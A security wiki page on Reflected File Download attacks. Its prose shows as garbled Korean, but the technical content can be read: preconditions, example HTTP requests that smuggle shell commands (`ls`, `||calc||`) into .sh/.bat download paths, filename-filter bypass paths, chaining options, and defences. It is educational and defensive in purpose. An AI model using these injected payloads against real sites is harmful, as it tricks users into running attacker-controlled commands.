Back

RFD (Remote File Download)

๐Ÿ” Introduction

RFD(Remote File Download)๋Š” ํ™•์žฅ์ž, ํŒŒ์ผ ๋‚ด์šฉ์— ๋Œ€ํ•ด ํ†ต์ œ ๊ฐ€๋Šฅํ•œ ๋‹ค์šด๋กœ๋“œ ๊ธฐ๋Šฅ์„ ์ด์šฉํ•œ ๊ณต๊ฒฉ ๊ธฐ๋ฒ•์œผ๋กœ ์‹ ๋ขฐ ๋„๋ฉ”์ธ์—์„œ ์‚ฌ์šฉ์ž๊ฐ€ ๊ณต๊ฒฉ์ฝ”๋“œ๊ฐ€ ํฌํ•จ๋œ ํŒŒ์ผ์„ ๋‹ค์šด๋กœ๋“œํ•˜๊ณ  ์‹คํ–‰ํ•˜๋„๋ก ์œ ๋„ํ•˜์—ฌ ์‚ฌ์šฉ์ž๋‹จ ์˜์—ญ์—์„œ ๋ช…๋ น์„ ์‹คํ–‰ํ•  ์ˆ˜ ์žˆ์Šต๋‹ˆ๋‹ค.

์‹คํ–‰์„ ์œ ๋„ํ•œ๋‹ค๋Š” ์ ์—์„œ ๋งˆ์น˜ ํ”ผ์‹ฑ ๊ณต๊ฒฉ๊ณผ ๋น„์Šทํ•ด๋ณด์ด์ง€๋งŒ ์‹ ๋ขฐ ๋„๋ฉ”์ธ์„ ์‚ฌ์šฉํ•œ๋‹ค๋Š” ์ , ์ด๋กœ์ธํ•œ ๊ฒฐ๊ณผ๊ฐ€ ๋ช…๋ น ์‹คํ–‰์ด๋ผ๋Š” ์ ์—์„œ CSV Injection๊ณผ ๋งค์šฐ ์œ ์‚ฌํ•œ ํ˜•ํƒœ์˜ ๊ณต๊ฒฉ์ž…๋‹ˆ๋‹ค.

๐Ÿ—ก Offensive techniques

Detect

RFD ๊ณต๊ฒฉ ์„ฑ๊ณต์„ ์œ„ํ•ด์„  ํ•„์ˆ˜ ์กฐ๊ฑด์ด ์กด์žฌํ•˜๋ฉฐ, ์ด๋Š” RFD ์ทจ์•ฝ์ ์„ ์‹๋ณ„ํ•˜๋Š”๋ฐ ์žˆ์–ด์„œ ๊ฐ€์žฅ ์šฐ์„  ์ฒดํฌ๋˜์–ด์•ผํ•  ๋ถ€๋ถ„์ž…๋‹ˆ๋‹ค.

Content-Disposition: attachment

RFD๋Š” ์‚ฌ์šฉ์ž๊ฐ€ ์‹ ๋ขฐ ๋„๋ฉ”์ธ์—์„œ์˜ ๋งํฌ๋กœ ์ธํ•ด ํŒŒ์ผ์„ ๋‹ค์šด๋กœ๋“œํ•˜๊ณ , ์‹คํ–‰ํ•˜๋„๋ก ์œ ๋„ํ•˜๋Š” ๊ณต๊ฒฉ์ด๊ธฐ ๋•Œ๋ฌธ์— ์‹ ๋ขฐ ๋„๋ฉ”์ธ ๋‚ด ํŽ˜์ด์ง€์—์„œ ํŒŒ์ผ ๋‹ค์šด๋กœ๋“œ๊ฐ€ ์ผ์–ด๋‚˜์•ผ ํ•ฉ๋‹ˆ๋‹ค.

์›น ์„œ๋น„์Šค์—์„  Content-Disposition ํ—ค๋”๋ฅผ ํ†ตํ•ด ํŒŒ์ผ ๋‚ด์šฉ์ด ์–ด๋–ป๊ฒŒ ์ฒ˜๋ฆฌ๋ ์ง€ ๋ช…์‹œํ•˜๊ณ , ์ด ๊ฐ’์ด attachment์ธ ๊ฒฝ์šฐ ๋‹ค์šด๋กœ๋“œ๋ฅผ ์‹คํ–‰ํ•˜๊ธฐ ๋•Œ๋ฌธ์— Response header ๋‚ด ํ•ด๋‹น ํ—ค๋”๊ฐ€ ์žˆ๋Š”์ง€ ์ฒดํฌ๊ฐ€ ํ•„์š”ํ•ฉ๋‹ˆ๋‹ค.

Content-Disposition: attachment

ํŒŒ์ผ ํ™•์žฅ์ž๋ฅผ ์ปจํŠธ๋กคํ•  ์ˆ˜ ์žˆ์–ด์•ผ ํ•จ

์‚ฌ์šฉ์ž๋‹จ์—์„œ ํŒŒ์ผ์„ ์‹คํ–‰ํ•˜์—ฌ ๋ช…๋ น์„ ์‹คํ–‰ํ•˜๊ธฐ ๋•Œ๋ฌธ์— ๋‹ค์šด๋กœ๋“œ๋˜๋Š” ํŒŒ์ผ์˜ ํ™•์žฅ์ž๋ฅผ ์ปจํŠธ๋กคํ•  ์ˆ˜ ์žˆ์–ด์•ผ ํ•ฉ๋‹ˆ๋‹ค.

Response๋ฅผ ์ปจํŠธ๋กคํ•  ์ˆ˜ ์žˆ์–ด์•ผํ•จ

ํŒŒ์ผ ๋‹ค์šด๋กœ๋“œ ํ›„ ์‹คํ–‰ ์‹œ ๋ช…๋ น ์‹คํ–‰์„ ์œ„ํ•œ ์ฝ”๋“œ๋ฅผ ์‚ฝ์ž…ํ•˜๊ธฐ ์œ„ํ•ด์„  Response body๋ฅผ ์ปจํŠธ๋กคํ•  ์ˆ˜ ์žˆ์–ด์•ผ ํ•ฉ๋‹ˆ๋‹ค. ์ด๋Š” Reflected XSS์™€ ์„ ํ–‰์กฐ๊ฑด์ด ๋น„์Šทํ•ฉ๋‹ˆ๋‹ค.

Exploitation

MacOS and Linux

Request

GET /s;/install.sh;?q=hwul\"`ls` HTTP/1.1
Host: example.com

Response

HTTP/1.1 200 OK
Content-Type: application/json;
Content-Disposition: attachment

{"result":["q","hwul\"`ls`","zzzz"]}

Windows

Request

GET /s;/install.bat;?q=hwul\"||calc|| HTTP/1.1
Host: example.com

Response

HTTP/1.1 200 OK
Content-Type: application/json;
Content-Disposition: attachment

{"result":["q","hwul\"||calc||","zzzz"]}

Bypass protection

Bypass filename protection

  • /get_user_profile.bat
  • /get_user_profile;setup.bat
  • /get_user_profile/setup.bat
  • /get_user_profile;/setup.bat
  • /get_user_profile;/setup.bat;

Bypass command

๋ช…๋ น์ด ์‹คํ–‰๋˜๋Š” ๊ตฌ๊ฐ„์ด ์‚ฌ์šฉ์ž ๊ตฌ๊ฐ„์ผ ๋ฟ์ด์ง€ ์ „๋ฐ˜์ ์ธ ๋ฉ”์ปค๋‹ˆ์ฆ˜์€ Command Injection๊ณผ ๋™์ผํ•ฉ๋‹ˆ๋‹ค. ๋งŒ์•ฝ ์„œ๋น„์Šค์—์„œ ํŠน์ˆ˜๋ฌธ์ž๋ฅผ ๊ธฐ๋ฐ˜์œผ๋กœ ์ฐจ๋‹จํ–ˆ๋‹ค๋ฉด Command Injection ์šฐํšŒ์™€ ์œ ์‚ฌํ•œ ๋ฐฉ๋ฒ•์œผ๋กœ ๊ณต๊ฒฉ์„ ์‹œ๋„ํ•ด๋ณผ ์ˆ˜ ์žˆ์Šต๋‹ˆ๋‹ค.

https://www.hahwul.com/cullinan/command-injection/#bypass-protection

Chain attack

ํ•ด๋‹น ์ทจ์•ฝ์ ์ด ๊ณต๊ฐœ๋œ 2014๋…„ ๋‹น์‹œ์—๋Š” ๋‹จ์ˆœํžˆ ๋งํฌ๋ฅผ ์ด์šฉํ•œ ๊ณต๊ฒฉ ๊ธฐ๋ฒ•์ด์˜€์ง€๋งŒ, ํ˜„์žฌ(2021๊ธฐ์ค€) Web Cache Poisoning, HTTP Request Smuggling ๋“ฑ ๊ด‘๋ฒ”์œ„์˜ ์‚ฌ์šฉ์ž๋ฅผ ๋Œ€์ƒ์œผ๋กœ ๊ณต๊ฒฉ์ž๊ฐ€ ์˜๋„ํ•œ Response๋ฅผ ์ „๋‹ฌํ•  ์ˆ˜ ์žˆ๋Š” ๊ณต๊ฒฉ ๋ฐฉ๋ฒ•์ด ๋งŽ์ด ๋‚˜์™€์žˆ๋Š” ์ƒํƒœ๋ผ ๋‹ค๋ฅธ ์ทจ์•ฝ์ ๊ณผ ์—ฐ๊ณ„์‹œ ํŒŒ๊ธ‰๋ ฅ์„ ์‰ฝ๊ฒŒ ์˜ฌ๋ฆด ์ˆ˜ ์žˆ์Šต๋‹ˆ๋‹ค.

  • Web Cache Poisoning
  • Web Cache Deception
  • HTTP Request Smuggling
  • H2C Smuggling
  • Etc…

๐Ÿ›ก Defensive techniques

Protect user-controlled filename

File Download ๊ตฌ๊ฐ„(Content-Disposition์„ ์‚ฌ์šฉํ•˜๋Š” ๊ตฌ๊ฐ„)์—์„œ ์‚ฌ์šฉ์ž๊ฐ€ filename์„ ์ปจํŠธ๋กคํ•  ์ˆ˜ ์žˆ๋„๋ก staticํ•˜๊ฒŒ ์ œํ•œํ•ฉ๋‹ˆ๋‹ค. ๋งŒ์•ฝ filename์˜ ํ†ต์ œ๊ถŒ์„ ์ œ๊ณตํ•ด์•ผ ํ•˜๋Š” ๊ฒฝ์šฐ ์•…์˜์ ์ธ filename(e.g .sh .bat)์„ ์‚ฌ์šฉํ•  ์ˆ˜ ์—†๋„๋ก ์ œํ•œ์ด ํ•„์š”ํ•ฉ๋‹ˆ๋‹ค.

Using auth header

ํ•ด๋‹น ๊ธฐ๋Šฅ์ด API์ธ ๊ฒฝ์šฐ ๋ณ„๋„์˜ ์ธ์ฆ ํ—ค๋” ๋“ฑ์„ ํ†ตํ•ด ๊ฒ€์ฆํ•˜๋Š” ๊ฒƒ์ด ์ข‹์Šต๋‹ˆ๋‹ค. RFD๋Š” Reflected XSS, Open Redirect์™€ ๊ฐ™์ด URL์„ ๊ธฐ๋ฐ˜์œผ๋กœ ํ•œ ๊ณต๊ฒฉ์ด๋ผ ํ—ค๋” ๊ธฐ๋ฐ˜์œผ๋กœ API Key ๋“ฑ์„ ๊ฒ€์ฆํ•˜๊ฒŒ ๋˜๋ฉด ํ•ด๋‹น ์š”์ฒญ์œผ๋กœ ํƒ€ ์‚ฌ์šฉ์ž์—๊ฒŒ ์˜ํ–ฅ์„ ๋ผ์น  ์ˆ˜ ์—†๊ฒŒ ๋ฉ๋‹ˆ๋‹ค.

CrossSite, CrossOrigin protection

SOP, CSRF Token, Referer Check ๋“ฑ Cross-site, Cross-origin์—์„œ์˜ ๋ณด์•ˆ ์ •์ฑ…๋“ค์„ ์ด์šฉํ•˜์—ฌ ๋ฐฉ์–ดํ•  ์ˆ˜ ์žˆ์Šต๋‹ˆ๋‹ค. ๋ฉ”์ปค๋‹ˆ์ฆ˜์€ ์ด๊ฒƒ์ด ์ •์ƒ์ ์ธ ํŽ˜์ด์ง€๋กœ ๋ถ€ํ„ฐ ๋ฐœ์ƒํ•œ ์š”์ฒญ์ธ์ง€ ๊ฒ€์ฆํ•˜๋Š” ํ˜•ํƒœ์ž…๋‹ˆ๋‹ค.

๐Ÿ“š Articles

๐Ÿ“Œ References

Licensed under CC BY-NC-SA 4.0